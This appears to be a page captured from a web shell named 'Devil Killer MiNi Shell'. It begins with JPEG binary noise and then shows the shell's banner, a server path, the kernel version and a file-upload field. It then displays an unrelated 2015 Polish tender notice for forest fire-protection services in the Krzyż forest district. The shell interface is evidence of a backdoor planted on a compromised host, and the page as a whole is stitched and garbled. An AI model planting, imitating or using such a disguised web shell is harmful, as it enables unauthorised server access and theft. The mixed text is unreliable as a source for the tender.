JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150218/36612-N-2015.html

<p class="kh_header"><b>Krzyż Wielkopolski: Usługi ochrony przeciwpożarowej lasów Nadleśnictwa Krzyż w 2015 r.</b><br>
<b>Numer ogłoszenia: 36612 - 2015; data zamieszczenia: 18.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lasy Państwowe Nadleśnictwo Krzyż , Łokacz Mały ul. Adama Mickiewicza 1, 64-761 Krzyż Wielkopolski, woj. wielkopolskie, tel. 067 2564009, 2564097, faks 067 2564561.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krzyz.pila.lasy.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowe Gospodarstwo Leśne Lasy Państwowe.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi ochrony przeciwpożarowej lasów Nadleśnictwa Krzyż w 2015 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa ochrony przeciwpożarowej obszarów leśnych Nadleśnictwa Krzyż w 2015 r. 
Przedmiot zamówienia został podzielony na trzy części:
Część I - usługa związana z obsługą i nadzorem bazy lotniczej Herburtowo.
Opis zakresu usługi w ramach części I:
a). Usługa związana z całodobowym nadzorem bazy lotniczej Herburtowo, położonej    w miejscowości Marianowo, 64-730 Wieleń, wraz z sprzętem samolot, zbiorniki paliw, wyposażeniem budynków dyspozycyjnego, warsztatowego i magazynowego,
b). Utrzymanie w dobrym stanie Agro-rolniczym płyty trawiastej lotniska, polegające na jej odpowiednim nawożeniu, napowietrzeniu, koszeniu raz w tygodniu, uprzątnięciu skoszonej trawy poza pas startowy lotniska, usuwaniu kretowisk. Powyższe zabiegi należy rejestrować w zeszycie kontrolnym LBL Herburtowo.
c). Obsługa związana z pracami przygotowawczymi do otwarcia sezonu przeciwpożarowego i jego zakończenia.
Uwaga: Paliwo do kosiarki zakupuje Wykonawca, nawozy Zamawiający
Część II - usługa związana z pełnieniem dyżurów przeciwpożarowych w punkcie alarmowo-dyspozycyjnym w skrócie: PAD.
Opis zakresu usługi w ramach części II:
a). Wykonywanie dyżurów odbywać się będzie w punkcie alarmowo-dyspozycyjnym PAD w biurze Nadleśnictwa. Praca dyżurnego PAD pełniona będzie od dnia               16.03.2015 r. do 31.10.2015 r., od godziny 9.00 do godziny 21.00 w dni robocze i w dni wolne od pracy w tym także święta. Wskazane godziny dyżurowania mogą ulec zmianie w zależności od stopnia zagrożenia pożarowego, a także akcji gaśniczej. Pełnienie dyżuru i czasu jego trwania każdorazowo uzgadniane jest bezpośrednio z Nadleśniczym lub Zastępcą Nadleśniczego.
b). Podstawowymi obowiązkami pełniącego dyżur w PAD będą: sprawdzenie stanu łączności radiowej,  ustalenie stopnia zagrożenia pożarowego lasu i jego ogłoszenie , alarmowanie sił i środków w przypadku powstania pożaru oraz współdziałanie w organizacji akcji gaśniczej, współpraca z innymi nadleśnictwami w zakresie wykrywania i lokalizacji pożarów, informowanie pełnomocnika nadleśniczego o zaistniałych pożarach i innych wypadkach nadzwyczajnych, drukowanie map niezbędnych dla uczestników akcji gaśniczej.
c). Obowiązkami pełniącego dyżur w PAD jest uważne obserwowanie obrazu z kamery obejmującej obszary leśne. Po zauważeniu pożaru do obowiązków dyżurnego należeć  będzie: ustalenie dokładnej lokalizacji pożaru w terenie, ustalenie najdogodniejszej drogi dojazdowej do pożaru lub miejsca w jego pobliżu, odnotowanie w odpowiednim dzienniku godziny zgłoszenia, ustaloną lokalizację pożaru oraz trasę dojazdu do pożaru, powiadomienie o pożarze stanowiska do kierowania właściwej terenowo powiatowej miejskiej komendy Państwowej Straży Pożarnej ewentualnie bezpośrednio jednostki ratowniczo-gaśniczej, jeśli przewidują to odrębne przepisy tj. Sposoby postępowania na wypadek powstania pożaru, powiadomienie o pożarze pełnomocnika nadleśniczego i regionalnego PAD, powiadomienie o pożarze na polecenie pełnomocnika nadleśniczego - Nadleśniczego lub Zastępcę Nadleśniczego, zaalarmowanie i skierowanie do pożaru w razie konieczności własnych sił i środków, utrzymywanie łączności z miejscem akcji gaśniczej, wykonywanie poleceń pełnomocnika nadleśniczego uczestniczącego w akcji gaśniczej.
d). W przypadku zauważenia dymu, ognia w lesie lub w jego pobliżu obowiązkami pełniącego dyżur w PAD będzie należało wpisanie do dziennika p-poż meldunku, który powinien zawierać: własny kryptonim lub nazwę punktu obserwacyjnego, przedmiot     i czas obserwacji, azymut pożaru, przybliżone miejsce powstania pożaru, wielkość zauważonego dymu, kolor i tendencje rozwojowe rośnie/maleje, itp. 
e). Do obowiązków dyżurnego PAD w zakresie używanego sprzętu będzie dbanie o sprawność powierzonego sprzętu i urządzeń, dbanie o czystość i nienaganny stan punktu alarmowo-dyspozycyjnego, zgłaszanie uprawionemu pracownikowi Nadleśnictwa  o wszelkich zauważonych usterkach, wyłączanie sprzętu i urządzeń znajdujących się w punkcie obserwacyjnym w przypadku wystąpienia zjawisk pogodowych mogących uszkodzić sprzęt m.in. burzy. 
f). Do obowiązków dyżurnego PAD po zakończonym dyżurze będzie: wyłączenie wszystkich urządzeń i sprzętu będącego przedmiotem pracy w punkcie obserwacyjnym, zgodnie z zasadami użytkowania i obsługi tych urządzeń.
g). Obowiązkami pełniącego dyżur w PAD, po zakończeniu akcji gaśniczej będzie: współdziałanie w organizacji zabezpieczenia pożarzyska oraz przekazanie do regionalnego PAD-u wstępnego meldunku pożarowego.
h). Dyżurnego w punkcie alarmowo-dyspozycyjnym będzie obowiązywało przestrzeganie przepisów bezpieczeństwa i hieny pracy a także przepisów przeciwpożarowych.
Część III - usługa związana z pełnieniem dyżurów jako kierowca - operator samochodu patrolowo-gaśniczego.

Opis zakresu usługi w ramach części III
a). Wykonywanie dyżurów jako kierowca - operator samochodu patrolowo-gaśniczego odbywać się będzie w dwuosobowej obsadzie. Praca kierowcy i jego pomocnika pełniona będzie od dnia 16.03.2015 r., do 31.10.2015 r., od godziny 14.00 do godziny 21.00 w dni robocze i od godziny 9.00 do godziny 21.00 w dni wolne od pracy w tym również święta. Wskazane godziny dyżurowania mogą ulec zmianie w zależności od stopnia zagrożenia pożarowego, a także akcji gaśniczej. Pełnienie dyżuru i czasu jego trwania każdorazowo uzgadniane jest bezpośrednio z Nadleśniczym lub Zastępcą Nadleśniczego.
b).Samochód patrolowo - gaśniczy marki Ford Ranger wraz z wyposażeniem jest własnością Nadleśnictwa Krzyż a oddanie go do dyspozycji na czas wykonywania usługi Wykonawcy nastąpi na podstawie umowy użyczenia.

Wykonawca, może złożyć ofertę na jedną lub większą ilość części.

Zamawiający uzna ofertę za złożoną poprawnie, jeśli będzie ona obejmować cały zakres usług przewidzianych w SIWZ dla danej części..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa             
w art. 67 ust. 1 pkt 6 ustawy Pzp w wysokości 10% wartości poszczególnych części
zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 75.25.11.10-4, 75.25.11.20-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium ustala się w kwocie:  

dla części I -   2000,00 zł, słownie: dwa tysiące złotych 
dla części II -  1000,00 zł, słownie: jeden tysiąc złotych 
dla części III - 1000,00 zł, słownie: jeden tysiąc złotych 

Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego: PKO BANK POLSKI SA oddział Krzyż Wlkp.
Nr rachunku : 17 1020 3844 0000 1702 0076 7533  z dopiskiem na blankiecie przelewu: wadium na zabezpieczenie oferty przetargowej zadania:

Usługi ochrony przeciwpożarowej lasów Nadleśnictwa Krzyż w 2015 r., dla części nr

Uwaga: potwierdzenie wpłaty wadium należy dołączyć do oferty!

Wadium może być wnoszone również w formie: poręczenia bankowego, poręczenia pieniężnego SKOK, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez podmioty  o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U.      Nr 109, poz. 1158 z późn. zm., które należy w formie nienaruszonego oryginału zdeponować w kasie u Zamawiającego, a kopię zaleca się załączyć do oferty.
Z treści gwarancji powinno wynikać bezwarunkowe i nieodwołalne, na każde pisemne żądanie zgłoszone przez Zamawiającego w okresie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy Pzp. 
Wadium musi być wniesione najpóźniej do  wyznaczonego terminu składania ofert. 
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie pełna kwota wymaganego wadium wpłynie na rachunek bankowy Zamawiającego.
Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium w wyznaczonym terminie zostanie wykluczony z postępowania, a jego oferta uznana zostanie za odrzuconą.
Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp.
Zamawiający będzie żądał ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium w sytuacji, jak w pkt. 6, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez Zamawiającego.
W przypadku wniesienia odwołania, Zamawiający nie później niż na 7 dni przed upływem ważności wadium, wezwie wykonawców, pod rygorem wykluczenia z postępowania, do przedłużenia ważności wadium albo wniesienia nowego wadium na okres niezbędny do zabezpieczenia postępowania do zawarcia umowy. Jeżeli odwołanie wniesiono po wyborze oferty najkorzystniejszej, wezwanie skieruje jedynie do wykonawcy, którego ofertę wybrano jako najkorzystniejszą.
Zamawiający zatrzymuje wadium wraz z odsetkami w przypadkach określonych w ustawie Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>jeżeli przepisy prawa nakładają obowiązek ich posiadania zostanie uznany za spełniony jeżeli Wykonawca załączy do oferty oświadczenie o spełnieniu warunków określonych w  art. 22 ust. 1 ustawy Pzp, sporządzone wg załącznika nr 2.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zostanie uznany za spełniony jeżeli Wykonawca załączy do oferty oświadczenie o spełnieniu warunków określonych  w  art. 22 ust. 1 ustawy Pzp, sporządzone wg załącznika nr 2, oraz wykaże i udokumentuje referencjami, opiniami, lub listami polecającymi iż  w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonywał co najmniej 2 usługi o charakterze:

dla części I - minimum 10 000 złotych/brutto obejmującą prace w zakresie zbliżonym lub podobnym do usług wskazanych dla części I zamówienia

dla części II - minimum 10 000 złotych/brutto obejmującą prace w zakresie zbliżonym lub podobnym do usług wskazanych dla części II zamówienia

dla części III - minimum 10 000 złotych/brutto obejmująca prace w zakresie zbliżonym lub podobnym do usług wskazanych dla części III zamówienia

z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zostanie uznany za spełniony jeżeli Wykonawca załączy do oferty oświadczenie o spełnieniu warunków określonych w  art. 22 ust. 1 ustawy Pzp, sporządzone wg załącznika nr 2, oraz wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług w celu realizacji zamówienia wraz z informacją             o podstawie dysponowania tymi zasobami w tym:
dla części I:
Urządzenie do napowietrzania wielkopowierzchniowych terenów zielonych tzw. skaryfikator 	1 szt.
Kosiarka samojezdna	1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zostanie uznany za spełniony jeżeli Wykonawca  wykaże, że dysponują lub  będą dysponować pracownikami do  wykonania usługi, w szczególności  odpowiedzialnych za świadczenie usług, wraz z informacjami  na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych  przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami.
dla części I:  
Rodzaj uprawnień	Minimalna liczba osób posiadająca wymagane uprawnienia
Posiada zaświadczenie uprawniające do kontaktu ze środkami ochrony roślin dla wszystkich klas toksyczności, przewidziane do pracy przy samolotowych zabiegach zwalczania organizmów szkodliwych	1 osoba

dla części II: 
Rodzaj uprawnień	Minimalna liczba osób posiadająca wymagane uprawnienia
Posiada wykształcenie leśne, co najmniej średnie	1 osoba
Posiada znajomość obsługi radiotelefonu, komputera	3 osoby
Posiada znajomość obsługi programu leśnej mapy numerycznej	3 osoby
Posiada znajomość obsługi programu monitoringu przeciwpożarowego lasów	3 osoby

dla części III:
Rodzaj uprawnień	Minimalna liczba osób posiadająca wymagane uprawnienia
Posiada prawo jazdy kategorii B kierowca+pomocnik	2 osoby

W tym celu Wykonawca sporządzi wg załącznika nr 5 wykaz osób, które będą uczestniczyć w wykonaniu zamówienia oraz zakresu wykonywanych przez nich czynności, oraz informacją o podstawie dysponowania tymi osobami.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zostanie uznany za  spełniony jeżeli Wykonawca załączy do oferty oświadczenie o spełnieniu  warunków określonych w  art. 22 ust. 1 ustawy Pzp, sporządzone wg załącznika nr 2;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Ofertę wykonania sporządzoną zgodnie z Załącznikiem nr 1 do SIWZ.
- W przypadku wykonawców wspólnie ubiegających się o zamówienie - pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
- Pełnomocnictwo do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik, jeżeli umocowanie nie wynika z innych załączonych do oferty dokumentów.
- Wykaz części zamówienia, które Wykonawca zamierza zlecić do wykonania podwykonawcom - Załącznik nr 1a do SIWZ - jeśli dotyczy.
- Potwierdzenie wpłaty wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umowy określa Załącznik nr 7 do niniejszej specyfikacji istotnych warunków zamówienia.W sporządzanej ofercie Wykonawca musi uwzględnić zapisy wzoru umowy.
Wszelkie pytania i wątpliwości dotyczące wzoru umowy będą rozpatrywane jak dla całej SIWZ,  zgodnie z art. 38 ustawy Pzp. Umowa zostanie zawarta na podstawie złożonej oferty Wykonawcy. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia:

- jeśli zmiana stawki podatku VAT będzie  powodować  zwiększenie  kosztów  wykonania  po stronie  wykonawcy, Zamawiający  dopuszcza  możliwość zwiększenia  wynagrodzenia  o kwotę równą różnicy  w kwocie  podatku  VAT  zapłaconego  przez  wykonawcę, 

- jeśli  zmiana  stawki VAT  będzie powodować zmniejszenie  kosztów wykonania  umowy  po  stronie wykonawcy, Zamawiający  przewiduje  możliwość  zmniejszenia  wynagrodzenia o kwotę stanowiącą różnicę  kwoty podatku  VAT  do zapłacenia  przez  wykonawcę ,

- kolizja z planowanymi  lub równolegle prowadzonymi przez inne  podmioty inwestycjami - w takim  przypadku  zmiany  w umowie  zostaną ograniczone  do zmian  koniecznych powodujących  uniknięcie  kolizji, a  wynagrodzenie  zostanie  ustalone  z zachowaniem  zasady opisanej w specyfikacji SIWZ i ofercie wykonawcy,

